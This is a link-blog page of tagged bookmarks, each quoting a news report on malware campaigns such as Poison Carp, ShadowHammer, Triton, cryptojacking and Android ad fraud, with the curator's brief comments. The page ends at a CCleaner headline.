recentpopularlog in

charlesarthur : malware   119

« earlier  
Inside the campaign that tried to compromise Tibetans’ iOS and Android phones • Ars Technica
Dan Goodin:
<p>Attackers from a group dubbed Poison Carp used one-click exploits and convincing social engineering to target iOS and Android phones belonging to Tibetan groups in a six-month campaign, researchers said. The attacks used mobile platforms to achieve a major escalation of the decade-long espionage hacks threatening the embattled religious community, researchers said.

The <a href="https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/">report was published on Tuesday by Citizen Lab</a>, a group at the University of Toronto's Munk School that researches hacks on activists, ethnic groups, and others. The report said the attackers posed as New York Times journalists, Amnesty International researchers, and others to engage in conversations over the WhatsApp messenger with individuals from the Private Office of His Holiness the Dalai Lama, the Central Tibetan Administration, the Tibetan Parliament, and Tibetan human rights groups. In the course of the conversation, the attackers would include links to websites that hosted "one-click" exploits—meaning they required only a single click to infect vulnerable phones.

None of the attacks Citizen Lab observed was successful, because the vulnerabilities exploited had already been patched on the iOS and Android devices that were attacked. Still, the attackers succeeded in getting eight of the 15 people they targeted to open malicious links, and bit.ly-shortened attack pages targeting iPhone users were clicked on 140 times. The research and coordination that went into bringing so many targeted people to the brink of exploitation suggest that the attackers behind the campaign—which ran from November 2018 to last May—were skilled and well-organized.</p>


This is separate from the attack reported by Google Project Zero to target Uighyur Muslims, also by China, but has lots of the same malware families. Citizen Lab says the Android malware used "hadn't previously been documented" (bit failed nonetheless). Read Goodin's writeup (or the CL original): this was very sophisticated.
china  tibet  malware  hacking 
17 days ago by charlesarthur
Returning rogue weather app continues mobile ad fraud • Upstream
<p>First discovered in January 2019 by mobile technology company Upstream to be triggering false premium transactions and, at the time, secretly harvesting consumer data, the app – called Weather Forecast: World Weather Accurate Radar – is preinstalled on specific Alcatel phones and also available on Google Play Store.  Following the revelation by Upstream the app immediately ceased its background activity and was withdrawn from the Play Store. [It subsequently returned to the Google Play Store.]

However, after an idle two-month period and despite the earlier exposure, Upstream says its Secure-D mobile security platform combating advertising fraud detected and blocked some 34 million fresh suspicious transaction attempts from Weather Forecast. The version of the weather app preinstalled on Alcatel Pixi4 devices attempted to subscribe nearly 700,000 mobile consumers to premium digital services without their knowledge in just six months.</p>
google  malware 
20 days ago by charlesarthur
File-storage app 4shared caught serving invisible ads and making purchases without consent • TechCrunch
Zack Whittaker:
<p>With more than 100 million installs, file-sharing service 4shared is one of the most popular apps in the Android app store.

But security researchers say the app is secretly displaying invisible ads and subscribes users to paid services, racking up charges without the user’s knowledge — or their permission — collectively costing millions of dollars.

“It all happens in the background… nothing appears on the screen,” said Guy Krief, chief executive of London-based Upstream, which shared its research exclusively with TechCrunch.

The researchers say the app contains suspicious third-party code that allowed the app to automate clicks and make fraudulent purchases. They said the component, built by Hong Kong-based Elephant Data, downloads code which is “directly responsible” for generating the automated clicks without the user’s knowledge. The code also sets a cookie to determine if a device has previously been used to make a purchase, likely as a way to hide the activity.</p>
malware 
july 2019 by charlesarthur
How Chinese spies got the NSA’s hacking tools, and used them for attacks • NY Times
Nicole Perlroth, David E. Sanger and Scott Shane:
<p>Symantec’s discovery, <a href="https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit">unveiled on Monday</a>, suggests that the same Chinese hackers the agency has trailed for more than a decade have turned the tables on the agency.

Some of the same N.S.A. hacking tools acquired by the Chinese were later dumped on the internet by a still-unidentified group that calls itself the Shadow Brokers and used by Russia and North Korea in devastating global attacks, although there appears to be no connection between China’s acquisition of the American cyberweapons and the Shadow Brokers’ later revelations.

But Symantec’s discovery provides the first evidence that Chinese state-sponsored hackers acquired some of the tools months before the Shadow Brokers first appeared on the internet in August 2016.

Repeatedly over the past decade, American intelligence agencies have had their hacking tools and details about highly classified cybersecurity programs resurface in the hands of other nations or criminal groups.</p>

This makes it much more risky to deploy hacks; any and all targets are getting much better at isolating and identifying cyberweapons. It's getting like chemical or biological warfare: the tools are getting too dangerous to deploy.
Malware  hacking  state 
may 2019 by charlesarthur
Google is banning a Play Store developer with more than half a billion app installs and ties to Baidu • Buzzfeed News
Craig Silverman:
<p>As of today, 46 apps from DO Global, which is partly owned by internet giant Baidu, are gone from the Play store. BuzzFeed News also found that DO Global apps no longer offer ad inventory for purchase via Google's AdMob network, suggesting the ban has also been extended to the internet giant's ad products.

Google would not comment specifically on the removals, but a source with knowledge of the action said the company was moving to ban DO Global overall, and that more app removals would follow.

"We actively investigate malicious behavior, and when we find violations, we take action, including the removal of a developer’s ability to monetize their app with AdMob or publish on Play," a Google spokesperson said.

Prior to the app removals, DO Global had roughly 100 apps in the Play store with over 600 million installs. Their removal from the Play store marks one of the biggest bans, if not the biggest, Google has ever instituted against an app developer. DO Global was a subsidiary of Baidu until it was spun out last summer; Baidu retains a 34% stake.

After this story was published. DO Global issued a statement to BuzzFeed News that acknowledged and apologized for "irregularities" in its apps, and said it accepts Google's decision.</p>


Hooray for curated app stores, I guess, and users (and journalists) who keep a close eye on them.
playstore  malware  advertising 
april 2019 by charlesarthur
Pirated streaming devices are filled with malware, researchers find • CNET
Alfred Ng:
<p>While you may have bought a bona fide Apple TV or Roku to watch shows on Netflix or Hulu, there's an entire market online for jailbroken and modified devices that are tuned to watch this same content for free. They come at a much cheaper price and offer free, unlimited access to shows that you'd normally have to pay a subscription fee for.

These devices work just like a Roku or a Fire TV Stick - you plug it into your TV and connect it to your Wi-Fi network. In some cases, they're loaded with apps.

If <a href="https://www.digitalcitizensalliance.org/clientuploads/directory/Reports/DCA_Fishing_in_the_Piracy_Stream_v6.pdf">the hardware isn't laced with malware, the apps are</a>, Timber Wolfe, a principal at Dark Wolfe Consulting, found in his research. He said 40% of apps for these devices were infected with malware that can take over a camera or microphone on the network within the first hour.

As viewers move to streaming devices to watch shows, like Apple TVs, Rokus, Chromecasts and Fire TVs, black market sellers have capitalized on cordcutters by offering pirated alternatives. Cybercriminals have taken notice, by targeting these bootleg boxes with malware, researchers found.</p>


Not just the camera: these "Kodi boxes" grab usernames and passwords by probing the user network; people who buy them are seven times more likely to report problems with malware.
piracy  malware 
april 2019 by charlesarthur
Mysterious hackers hid their 'Swiss Army' spyware for five years • WIRED
Andy Greenberg:
<p>Kaspersky says it first detected the TajMahal spyware framework last fall, on only a single victim's network: The embassy of a Central Asian country whose nationality and location Kaspersky declines to name. But given the software's sophistication, Shulmin says TajMahal has likely been deployed elsewhere. "It seems highly unlikely that such a huge investment would be undertaken for only one victim," he writes. "This suggests that there are either further victims not yet identified, or additional versions of this malware in the wild, or possibly both."

Those initial findings may indicate a very cautious and discreet state-sponsored intelligence-gathering operation, says Jake Williams, a former member of the National Security Agency's elite Tailored Access Operations hacking group. "The extensibility of it requires a large developer team," Williams notes. He points out also that the ability to avoid detection and the single known victim suggest extreme care in targeting, stealth, and operation security. "There's all kinds of stuff here that screams opsec and very regimented tasking."

Shulmin says Kaspersky hasn't yet been able to connect TajMahal, named for a file the spyware uses to move stolen data off a victim's machine, to any known hacker groups with the usual methods of code-matching, shared infrastructure, or familiar techniques. Its Central Asian target doesn't exactly provide any easy clues as to the hackers' identities either, given the vagueness of that description and the countries with sophisticated hacker teams with Central Asian interests, including China, Iran, Russia and the US. Nor has Kaspersky determined how the hackers behind TajMahal gain initial access to a victim network. But they do note that the group plants an initial backdoor program on machines, which the hackers labelled Tokyo.</p>


"Central Asia" implies somewhere in the ambit of Russia and China to me. Could be US, could be Israel, could be China, could be Russia.
hacking  malware  state 
april 2019 by charlesarthur
A powerful spyware app now targets iPhone owners • TechCrunch
Zack Whittaker:
<p>Security researchers have discovered a powerful surveillance app first designed for Android devices can now target victims with iPhones.

The spy app, found by researchers at mobile security firm Lookout, said its developer abused their Apple-issued enterprise certificates to bypass the tech giant’s app store to infect unsuspecting victims.

The disguised carrier assistance app once installed can silently grab a victim’s contacts, audio recordings, photos, videos and other device information — including their real-time location data. It can be remotely triggered to listen in on people’s conversations, the researchers found. Although there was no data to show who might have been targeted, the researchers noted that the malicious app was served from fake sites purporting to be cell carriers in Italy and Turkmenistan.

Researchers linked the app to the makers of a previously discovered Android app, developed by the same Italian surveillance app maker Connexxa, known to be in use by the Italian authorities.</p>


What's not clear is whether the app could grab those contacts, photos etc without the user's permission, or whether iOS's permissions structure is robust against that threat. Of course the social engineering side - "this app needs to access…" - can still work.
iphone  malware  hacking  security 
april 2019 by charlesarthur
Researchers find Google Play store apps were actually government malware • Motherboard
Lorenzo Franceschi-Bicchierai and Riccardo Coluccini:
<p>Hackers working for a surveillance company infected hundreds of people with several malicious Android apps that were hosted on the official Google Play Store for months, Motherboard has learned.

In the past, both government hackers and those working for criminal organizations have uploaded malicious apps to the Play Store. This new case once again highlights the limits of Google’s filters that are intended to prevent malware from slipping onto the Play Store. In this case, more than 20 malicious apps went unnoticed by Google over the course of roughly two years.

Motherboard has also learned of a new kind of Android malware on the Google Play store that was sold to the Italian government by a company that sells surveillance cameras but was not known to produce malware until now. Experts told Motherboard the operation may have ensnared innocent victims as the spyware appears to have been faulty and poorly targeted. Legal and law enforcement experts told Motherboard the spyware could be illegal.</p>


Italy's government subsequently shut down the malware infrastructure and investigated the company behind the spyware.
security  google  malware 
april 2019 by charlesarthur
Hacker Eva Galperin has a plan to eradicate stalkerware • WIRED
Andy Greenberg:
<p>"Full access to someone’s phone is essentially full access to someone’s mind," says Galperin, a security researcher who leads the Threat Lab of the digital civil liberties group the Electronic Frontier Foundation. "The people who end up with this software on their phones can become victims of physical abuse, of physical stalking. They get beaten. They can be killed. Their children can be kidnapped. It’s the small end of a very large, terrifying wedge."

Now Galperin has a plan to end that scourge for good—or at least take a serious bite out of the industry. In a talk she is scheduled to give next week at the Kaspersky Security Analyst Summit in Singapore, Galperin will lay out a list of demands: First, she's calling on the antivirus industry to finally take the threat of stalkerware seriously, after years of negligence and inaction. She'll also ask Apple to take measures to protect iPhone users from stalkerware, given that the company doesn't allow antivirus apps into its App Store. Finally, and perhaps most drastically, she says she'll call on state and federal officials to use their prosecutorial powers to indict executives of stalkerware-selling companies on hacking charges. "It would be nice to see some of these companies shut down," she says. "It would be nice to see some people go to jail."

Ahead of her talk, Galperin has notched her first win: Russian security firm Kaspersky announced today that it will make a significant change to how its antivirus software treats stalkerware on Android phones, where it's far more common than on iPhones. Rather than merely flag those spy apps as suspect but label them with a confusing "not a virus" message, as it has for most breeds of stalkerware in the past, Kaspersky's software will now show its users an unmistakeable "privacy alert" for any of dozens of blacklisted apps, and then offer options to delete or quarantine them to cut off their access to sensitive information.</p>
stalking  malware 
april 2019 by charlesarthur
Hackers hijacked ASUS software updates to install backdoors on thousands of computers • Motherboard
:
<p>Researchers at cybersecurity firm Kaspersky Lab say that ASUS, one of the world’s largest computer makers, was used to unwittingly install a malicious backdoor on thousands of its customers’ computers last year after attackers compromised a server for the company’s live software update tool. The malicious file was signed with legitimate ASUS digital certificates to make it appear to be an authentic software update from the company, Kaspersky Lab says…

…The researchers estimate half a million Windows machines received the malicious backdoor through the ASUS update server, although the attackers appear to have been targeting only about 600 of those systems. The malware searched for targeted systems through their unique MAC addresses. Once on a system, if it found one of these targeted addresses, the malware reached out to a command-and-control server the attackers operated, which then installed additional malware on those machines.

Kaspersky Lab said it uncovered the attack in January after adding a new supply-chain detection technology to its scanning tool to catch anomalous code fragments hidden in legitimate code or catch code that is hijacking normal operations on a machine. The company plans to release a full technical paper and presentation about the ASUS attack, which it has dubbed ShadowHammer, next month at its Security Analyst Summit in Singapore. In the meantime, Kaspersky has<a href="https://securelist.com/operation-shadowhammer/89992/"> published some of the technical details on its website</a>.</p>


Asus, you won't be surprised to hear, hadn't responded by publication time.
asus  infection  malware 
march 2019 by charlesarthur
Triton is the world’s most murderous malware, and it’s spreading • MIT Technology Review
Martin Giles:
<p>In a worst-case scenario, the rogue code could have led to the release of toxic hydrogen sulfide gas or caused explosions, putting lives at risk both at the facility and in the surrounding area.

[Julian] Gutmanis recalls that dealing with the malware at the petrochemical plant, which had been restarted after the second incident, was a nerve-racking experience. “We knew that we couldn’t rely on the integrity of the safety systems,” he says. “It was about as bad as it could get.”

In attacking the plant, the hackers crossed a terrifying Rubicon. This was the first time the cybersecurity world had seen code deliberately designed to put lives at risk. Safety instrumented systems aren’t just found in petrochemical plants; they’re also the last line of defence in everything from transportation systems to water treatment facilities to nuclear power stations.

Triton’s discovery raises questions about how the hackers were able to get into these critical systems. It also comes at a time when industrial facilities are embedding connectivity in all kinds of equipment—a phenomenon known as the industrial internet of things. This connectivity lets workers remotely monitor equipment and rapidly gather data so they can make operations more efficient, but it also gives hackers more potential targets.</p>


First spotted late in 2017; origin still unknown.
security  malware  triton 
march 2019 by charlesarthur
Coinhive cryptojacking service to shut down in March 2019 • ZDNet
Catalin Cimpanu:
<p>Coinhive, an in-browser Monero cryptocurrency miner famous for being abused by malware gangs, announced this week its intention to shut down all operations next month, on March 8, 2019.

The service cited multiple reasons for its decision <a href="https://coinhive.com/blog/en/discontinuation-of-coinhive">in a blog post</a> published yesterday.

"The drop in hash rate (over 50%) after the last Monero hard fork hit us hard," the company said. "So did the 'crash' of the crypto currency market with the value of XMR depreciating over 85% within a year."

"This and the announced hard fork and algorithm update of the Monero network on March 9 has lead us to the conclusion that we need to discontinue Coinhive," the company said.

Coinhive said all in-browser Monero mining will stop working after March 8, and registered users will have until April 30 to withdraw funds from their accounts.</p>


Until someone malicious buys the domain and reactivates the code, which will still be sitting dormant on thousands of sites. Of note: "according to <a href="https://arxiv.org/pdf/1808.00811.pdf">an academic pape</a>r, the company was making in an estimated $250,000 per month up until last summer."
coinhive  cryptojacking  malware  bitcoin 
february 2019 by charlesarthur
Biohackers encoded malware in a strand of DNA • WIRED
Andy Greenberg:
<p>In new research they plan to present at the USENIX Security conference on Thursday, a group of researchers from the University of Washington has shown for the first time that it’s possible to encode malicious software into physical strands of DNA, so that when a gene sequencer analyzes it the resulting data becomes a program that corrupts gene-sequencing software and takes control of the underlying computer. While that attack is far from practical for any real spy or criminal, it's one the researchers argue could become more likely over time, as DNA sequencing becomes more commonplace, powerful, and performed by third-party services on sensitive computer systems. And, perhaps more to the point for the cybersecurity community, it also represents an impressive, sci-fi feat of sheer hacker ingenuity.

“We know that if an adversary has control over the data a computer is processing, it can potentially take over that computer,” says Tadayoshi Kohno, the University of Washington computer science professor who led the project, comparing the technique to traditional hacker attacks that package malicious code in web pages or an email attachment. “That means when you’re looking at the security of computational biology systems, you’re not only thinking about the network connectivity and the USB drive and the user at the keyboard but also the information stored in the DNA they’re sequencing. It’s about considering a different class of threat.”</p>


That is fabulously clever. (Thanks to the many people who sent this; Paul Guinnessy was first, I believe.) It's obvious when you think about it: a Turing machine reading an instruction set.
malware  hacking  dna 
february 2019 by charlesarthur
Google Play apps with more than 4.3 million downloads stole pics and pushed porn ads • Ars Technica
Dan Goodin:
<p>A <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/various-google-play-beauty-camera-apps-sends-users-pornographic-content-redirects-them-to-phishing-websites-and-collects-their-pictures/">blog post published by security firm Trend Micro</a> listed 29 camera- or photo-related apps, with the top 11 of them fetching 100,000 to 1 million downloads each. One crop of apps caused browsers to display full-screen ads when users unlocked their devices. Clicking the pop-up ads in some cases caused a paid online pornography player to be downloaded, although it was incapable of playing content. The apps were carefully designed to conceal their malicious capabilities.

“None of these apps give any indication that they are the ones behind the ads, thus users might find it difficult to determine where they’re coming from,” Trend Micro Mobile Threats Analyst Lorin Wu wrote. “Some of these apps redirect to phishing websites that ask the user for personal information, such as addresses and phone numbers.”

The apps also hid their icons from the Android app list. That made it hard for users to uninstall the apps, since there was no icon to drag and delete. The apps also used compression archives known as packers to make it harder for researchers—or presumably, tools Google might use to weed out malicious apps—from analyzing the wares.</p>
google  malware 
february 2019 by charlesarthur
I’ve got a bridge to sell you: why AutoCAD malware keeps chugging on • Ars Technica
Dan Goodin:
<p>The attacks aren’t new. Similar ones occurred as long ago as 2005, before AutoCAD provided the same set of robust defenses against targeted malware it does now. The attacks continued to go strong in 2009. A specific campaign recently spotted by security firm Forcepoint was active as recently as this year and has been active since at least 2014, an indication that malware targeting blueprints isn’t going away any time soon.

In an analysis expected to be published Wednesday, company researchers wrote:
<p>CAD changed our modern life and, as an unfortunate side effect, industrial espionage also changed along with it. Design schemes, project plans, and similar vital documents are being stored and shared between parties in a digital manner. The value of these documents–especially in new and prospering industries such as renewable energy–have probably never been this high. All this makes it attractive for the more skilled cybercriminal groups to chip in: instead of spamming out millions of emails and waiting for people to fall for it, significantly more money can be realized by selling blueprints to the highest bidder.</p>


Forcepoint said it has tracked more than 200 data sets and about 40 unique malicious modules, including one that purported to include a design for Hong Kong’s Zhuhai-Macau Bridge. The attacks include a precompiled and encrypted AutoLISP program titled acad.fas. It first copies itself to three locations in an infected computer to increase the chances it will be opened if it spreads to new computers. Infected computers also report to attacker-controlled servers, which use a series of obfuscated commands to download documents.</p>
autocad  malware 
november 2018 by charlesarthur
A top-tier app in Apple’s Mac App Store stole your browser history • TechCrunch
Zack Whittaker:
<p>Thanks in part to a <a href="https://www.youtube.com/watch?v=nZ7CVIy5Tq8&feature=youtu.be">video posted last month</a> on YouTube and with help from security firm Malwarebytes, it’s now clear what the app [Adware Doctor] is up to.

Security researcher Patrick Wardle, a former NSA hacker and now chief research officer at cybersecurity startup Digita Security, dug in and shared his findings with TechCrunch.

Wardle found that the downloaded app jumped through hoops to bypass Apple’s Mac sandboxing features, which prevents apps from grabbing data on the hard drive, and upload a user’s browser history on Chrome, Firefox and Safari browsers.

Wardle found that the app, thanks to Apple’s own flawed vetting, could request access to the user’s home directory and its files. That isn’t out of the ordinary, Wardle says, because tools that market themselves as anti-malware or anti-adware expect access to the user’s files to scan for problems. When a user allows that access, the app can detect and clean adware — but if found to be malicious, it can “collect and exfiltrate any user file,” said Wardle.

Once the data is collected, it’s zipped into an archive file and sent to a domain based in China.

Wardle said that for some reason in the last few days the China-based domain went offline. At the time of writing, TechCrunch confirmed that the domain wouldn’t resolve — in other words, it was still down.

“Let’s face it, your browsing history provides a glimpse into almost every aspect of your life,” said Wardle’s post. “And people have even been convicted based largely on their internet searches!”

He said that the app’s access to such data “is clearly based on deceiving the user.”</p>


I'd suggest that anything which claims to be helping you with adware is going to be a scam, unless it comes from a recognised cybersecurity company. The solution to adware is not running vulnerable products such as Flash and Java, and to be wary about what you download. At least Apple makes it hard to run apps from outside the Mac App Store.

This won't, of course, help anyone's trust in Huawei, ZTE and other Chinese companies with their own high-profile problems.
apple  malware  adware 
september 2018 by charlesarthur
60,000 Android devices hit by battery-saving app attack • Tripwire
Graham Cluley on a scam that "warns" you that your (Android) device - which it names, by some HTML-grabbing functionality - has a problem and recommends the app (and the only way to stop it is to kill the web page):
<p>So what happens if you do go to the Google Play store and install the battery-saving app being touted by the fake warning?

The first thing that should ring alarm bells in you is that the app demands access to a disturbing array of permissions including:

• Read sensitive log data
• Receive text messages (SMS)
• Receive data from Internet
• Pair with Bluetooth devices
• Full network access
• Modify system settings
I can’t think of any legitimate reason why a genuine battery-saving app would ever need such invasive abilities, which in combination with the app’s other functionality allows it to steal a user’s phone number, location, and details about their device including its IMEI number.

And so it comes as something of a surprise to discover that the Advanced Battery Saver app actually does live up to its advertising – monitoring a device’s battery status, killing unwanted background processes that consume significant resources, and making other attempts to keep batteries running for longer.

And it’s this strange dichotomy – the good and the bad behavior – which leads the researchers to speculate that the battery-saving app was perhaps originally designed to perform its intended advertised function (and to fulfill only that purpose) before being extended by its creators into underhand methods of income generation.</p>


There's no money in standard apps at that level now, if there ever was.

Chief among those is the app’s request for access to a user’s SMS text messages. One installed, the battery-saving app recruits devices into an ad-clicking scam, with the app “clicking” on advertising links it is sent via SMS to earn more income for the fraudsters behind the scheme.
android  malware 
june 2018 by charlesarthur
They’re on the lookout for malware that can kill • The Washington Post
Ellen Nakashima and Aaron Gregg:
<p>Dragos built a software product to help industrial companies detect cyberthreats to their networks and respond to them. Its clients include energy, manufacturing and petrochemical factories in the United States, Europe and Middle East.

In October, Dragos discovered Trisis, a malware that targets a “safety instrumented system,” or a machine whose sole function is to prevent fatal accidents. In a petrochemical plant, for instance, there are machines that operate at very high pressures, and if a valve blows, the pressure or the leak of hazardous materials could kill a human being. But a safety instrumented machine is supposed to shut down the entire system to reduce the risk of a fatal accident.

There has been one known deployment of the Trisis malware — FireEye called it Triton — at a petrochemical plant in Saudi Arabia in August. But a coding error prevented the malware from working as intended, and a potential catastrophe was averted.

As of this week the culprits behind Trisis were still active in the Middle East, Lee said. “It’s reasonable to assume that [what happened last year] is not a one-time event.’’

Though Dragos had some indication of who was responsible, the firm refrained from drawing a conclusion. “It wasn’t cut and dried,” Lee said. Dragos shared the malware with the Department of Homeland Security, but Lee argued against the government seeking to assign blame.

“The best they could do is a well-reasoned guess,” he said. “There’s not the years’ worth of data on this event that would make attribution possible.”</p>
malware  iot 
may 2018 by charlesarthur
Russian pleads guilty to aiding massive hacks in US • Daily Beast
Kevin Poulsen:
<p>Jurijs Martisevs, a 36-year-old Moscovite arrested on a trip to Latvia, helped run a service called Scan4you that filled a crucial niche in the underground economy. Before deploying a piece of malware, hackers need to know it won't be immediately detected and quarantined by the dozens of consumer and commercial security products on the market. That’s where Scan4you comes in. For fifteen cents a pop, a hacker could upload their pre-launch code to Scan4you, which would then automatically check it against 30 different security scanners and report back the results.

Armed with that information, a hacker can make iterative changes to their code until the detection rate is sufficiently low, or even zero. Scan4you was the most successful of a slew of similar offerings advertised on underground forums, and operated from at least 2009 until the arrest of Martisevs and a co-defendant last year.

"Throughout its lifetime, the service has had thousands of users,” reads a statement of facts agreed to by Martisevs, “and has received and scanned millions of malicious files.”

According to Martisevs' plea documents, Scan4you's customers included some serious players, including the perpetrators of a national retail breach in November 2013. The retailer is unnamed, but the timing and description coincides with that month’s massive Target hack. The hackers submitted variations of their credit card stealing code to Scan4you four times over the course of two weeks before finally deploying the malware on Black Friday weekend. The Target breach ultimately netted thieves some 40 million credit and debit cards, and resulted in a $10 million consumer class action against Target.

Ruslans Bondars, Martisevs' co-defendant, was allegedly the creator and technical brains behind Scan4you. Bondars is a Latvian national extradited along with Martisevs. He’s in custody pending a May trial date.</p>

The Feds may have the full database of malware, and even customer details. That would be a hell of a thing.
Security  malware  hacking  trial 
march 2018 by charlesarthur
Bad traffic: Sandvine’s PacketLogic devices used to deploy government spyware in Turkey and redirect Egyptian users to affiliate ads? • Citizenlab
Bill Marczak, Jakub Dalek, Sarah McKune, Adam Senft, John Scott-Railton, and Ron Deibert
<p>• Through Internet scanning, we found deep packet inspection (DPI) middleboxes on Türk Telekom’s network. The middleboxes were being used to redirect hundreds of users in Turkey and Syria to nation-state spyware when those users attempted to download certain legitimate Windows applications.

• We found similar middleboxes at a Telecom Egypt demarcation point. On a number of occasions, the middleboxes were apparently being used to hijack Egyptian Internet users’ unencrypted web connections en masse, and redirect the users to revenue-generating content such as affiliate ads and browser cryptocurrency mining scripts.

• After an extensive investigation, we matched characteristics of the network injection in Turkey and Egypt to Sandvine PacketLogic devices. We developed a fingerprint for the injection we found in Turkey, Syria, and Egypt and matched our fingerprint to a second-hand PacketLogic device that we procured and measured in a lab setting.

• The apparent use of Sandvine devices to surreptitiously inject malicious and dubious redirects for users in Turkey, Syria, and Egypt raises significant human rights concerns.</p>
security  malware  hacking  government 
march 2018 by charlesarthur
More Mailchimp malware: invoice 1717 from City Sign Graphics Ltd • My Online Security
<p>Back today with even more Mailchimp abuse and attempted malware spreading. By the time I got round to investigating the email, the links in it were down. At first I got a "Hostgator account suspended: message but now get an "error 500 server misconfigured: message.  A twitter post gave me the file # of the downloaded malware that I assume is still the Gootkit banking Trojan.

We still have no idea how the victim companies’ details or login credentials to the Mailchimp network are being stolen or compromised.

This next email has the subject of Invoice 1717 from CITY SIGN AND GRAPHICS LTD coming from CITY SIGN AND GRAPHICS LTD <callum.cooper=fleetalliance.co.uk@mail59.atl111.rsgsv.net>; on behalf of; CITY SIGN & GRAPHICS LTD <callum.cooper@fleetalliance.co.uk>

About one month ago we saw a malware campaign using Mailchimp to distribute the Gootkit banking trojan. Since then there have been a regular almost daily campaign. Today’s campaign has changed slightly and although the initial emails are coming via the Mailchimp system, the malware downloader and the payloads are coming from other sites which are probably/almost certainly compromised.

They use email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers.</p>

Obvious enough how they get Mailchimp logins: people are lazy and reuse them, and they get phished elsewhere. (Or you send out a phishing campaign around Mailchimp.)

It's long past time that username/password was enough to log you in to services that can reach so many people. And I say that as a user of Mailchimp.
Mailchimp  malware 
march 2018 by charlesarthur
Thousands of UK and US government websites hijacked by hidden crypto-mining code after popular plugin hacked • The Register
Chris Williams:
<p>Thousands of websites around the world – from the UK's NHS and ICO to the US government's court system – were today secretly mining crypto-coins on netizens' web browsers for miscreants unknown.

The affected sites all use a fairly popular plugin called Browsealoud, made by Brit biz Texthelp, which reads out webpages for blind or partially sighted people.

This technology was compromised in some way – either by hackers or rogue insiders altering Browsealoud's source code – to silently inject Coinhive's Monero miner into every webpage offering Browsealoud.

For several hours today, anyone who visited a site that embedded Browsealoud inadvertently ran this hidden mining code on their computer, generating money for the miscreants behind the caper.

A list of 4,200-plus affected websites can be found <a href=“https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/“>here</a>: they include The City University of New York (cuny.edu), Uncle Sam's court information portal (uscourts.gov), Lund University (lu.se), the UK's Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner's Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), plus a shedload of other .gov.uk and .gov.au sites, UK NHS services, and other organizations across the globe…

The Monero miner was added to Browsealoud's code some time between 0300 and 1145 UTC…Coinhive's code is mostly detected and stopped by antivirus packages and ad-blocking tools.</p>

Adblocking as the easy way to avoid malware, pt 943.
Cryptominer  malware  malvertising 
february 2018 by charlesarthur
Now even YouTube serves ads with CPU-draining cryptocurrency miners • Ars Technica
Dan Goodin:
<p>On Friday, researchers with antivirus provider Trend Micro said the ads helped drive a more than three-fold spike in Web miner detections. They said the attackers behind the ads were abusing Google's DoubleClick ad platform to display them to YouTube visitors in select countries, including Japan, France, Taiwan, Italy, and Spain.

The ads contain JavaScript that mines the digital coin known as Monero. In nine out of 10 cases, the ads will use publicly available JavaScript provided by Coinhive, a cryptocurrency-mining service that's controversial because it allows subscribers to profit by surreptitiously using other people's computers. The remaining 10 percent of the time, the YouTube ads use private mining JavaScript that saves the attackers the 30 percent cut Coinhive takes. Both scripts are programmed to consume 80 percent of a visitor's CPU, leaving just barely enough resources for it to function.

"YouTube was likely targeted because users are typically on the site for an extended period of time," independent security researcher Troy Mursch told Ars. "This is a prime target for cryptojacking malware, because the longer the users are mining for cryptocurrency the more money is made." Mursch said a campaign from September that used the Showtime website to deliver cryptocurrency-mining ads is another example of attackers targeting a video site.</p>
google  malware  advertising 
january 2018 by charlesarthur
EFF and Lookout uncover new malware espionage campaign infecting thousands around the world • Electronic Frontier Foundation
<p>The Electronic Frontier Foundation (EFF) and mobile security company Lookout have uncovered a new malware espionage campaign infecting thousands of people in more than 20 countries. Hundreds of gigabytes of data has been stolen, primarily through mobile devices compromised by fake secure messaging clients.

The trojanized apps, including Signal and WhatsApp, function like the legitimate apps and send and receive messages normally. However, the fake apps also allow the attackers to take photos, retrieve location information, capture audio, and more.

The threat, called Dark Caracal by EFF and Lookout researchers, may be a nation-state actor and appears to employ shared infrastructure which has been linked to other nation-state actors.</p>


Fear not, though: it <a href="https://www.lookout.com/info/ds-dark-caracal-ty">works</a> through phishing links which then direct people to third-party app stores. (None hit iOS, for this reason.) Stick to the legit stuff, you're OK.

Still amazing that people do this, ten years after mobile app stores arrived.
apps  malware  android 
january 2018 by charlesarthur
Warning: new undetectable DNS hijacking malware targeting Apple macOS users • The Hacker News
Mohit Kumar:
<p>A security researcher has <a href="https://objective-see.com/blog/blog_0x26.html">revealed</a> details of a new piece of undetectable malware targeting Apple's Mac computers—reportedly first macOS malware of 2018.

Dubbed OSX/MaMi, an unsigned Mach-O 64-bit executable, the malware is somewhat similar to DNSChanger malware that infected millions of computers across the world in 2012.

DNSChanger malware typically changes DNS server settings on infected computers, allowing attackers to route internet traffic through malicious servers and intercept sensitive information.
First appeared on the Malwarebytes forum, a user posted a query regarding unknown malware that infected his friend's computer that silently changed DNS settings on infected macOS to 82.163.143.135 and 82.163.142.137 addresses.

After looking at the post, ex-NSA hacker Patrick Wardle analysed the malware and found that it is indeed a 'DNS Hijacker,' which also invokes security tools to install a new root certificate in an attempt to intercept encrypted communications as well.</p>


So check your DNS settings. (Preferences, Network, Advanced, DNS). Also not detected at that point by any of 59 popular antivirus programs.
security  malware  mac 
january 2018 by charlesarthur
Cloudflare bans sites for using cryptocurrency miners • TorrentFreak
"Andy":
<p>It all began with The Pirate Bay, which quietly added a Javascript cryptocurrency miner to its main site, something that first manifested itself as a large spike in CPU utilization on the machines of visitors.

The stealth addition to the platform, which its operators later described as a test, was extremely controversial. While many thought of the miner as a cool and innovative way to generate revenue in a secure fashion, a vocal majority expressed a preference for permission being requested first, in case they didn’t want to participate in the program.

Over the past couple of weeks, several other sites have added similar miners, some which ask permission to run and others that do not. While the former probably aren’t considered problematic, the latter are now being viewed as a serious problem by an unexpected player in the ecosystem.

TorrentFreak has learned that popular CDN service Cloudflare, which is often criticized for not being harsh enough on ‘pirate’ sites, is actively suspending the accounts of sites that deploy cryptocurrency miners on their platforms.</p>


Good. That's an amazing abuse. Ads are bad, but they tend to load and sit there. (OK, maybe not video.) Actively parasitising someone else's CPU crosses a line.
browser  malware  bitcoin  javascript 
october 2017 by charlesarthur
CCleaner malware outbreak is much worse than it first appeared • Ars Technica
Dan Goodin:
